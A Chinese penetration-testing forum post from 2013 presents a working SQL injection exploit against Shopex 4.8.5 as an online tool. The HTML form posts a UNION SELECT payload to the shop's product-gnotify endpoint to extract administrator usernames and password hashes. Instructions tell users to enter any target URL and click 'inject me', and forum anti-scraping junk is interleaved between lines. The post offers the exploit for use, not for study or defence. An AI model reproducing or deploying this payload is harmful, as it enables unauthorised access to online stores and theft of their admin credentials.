中国网络渗透测试联盟
标题:
Shopex 4.8.5 SQL Injection Exp 0day
[打印本页]
作者:
admin
时间:
2013-1-23 09:20
标题:
Shopex 4.8.5 SQL Injection Exp 0day
<center>
1 Z! o& |- R$ c; r( |# _3 n3 ^
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
2 d. ]1 \& j9 Y: v- p( u
<form action="" method="post" name="submit_url">
. l9 k# J' C/ ]( R3 W
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
7 P; o2 a5 y f- t# [( o) a% u
<input type="hidden" name="goods[goods_id]" value="3">
# ]: ?$ x% X) e6 m! e% D# ^
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
* K1 x6 G J6 @5 n( \3 a; e8 ?
<input type="submit" value="给我注入" onclick=fsubmit()>
" \2 O# n+ @# F$ j' ]: b+ O
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
$ Q _/ A! N# {
5 Q* e! y% ^# G; X5 g
<script>
6 w' U# Y4 o, X5 z1 r9 _4 H
function fsubmit(){
% {0 P+ w# J3 @2 W
form = document.forms[0];
! ?( D! n" i+ h J
form.action = form.url.value+'/?product-gnotify';
/ y( w# ]& |, s& b$ X
form.submit();
9 o$ ]4 W: C: X* Q1 w) F. U9 L
}
) e/ F I- ?' U$ m9 ~
</script>
( Y! @3 r8 A* c: V; q1 |7 X
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2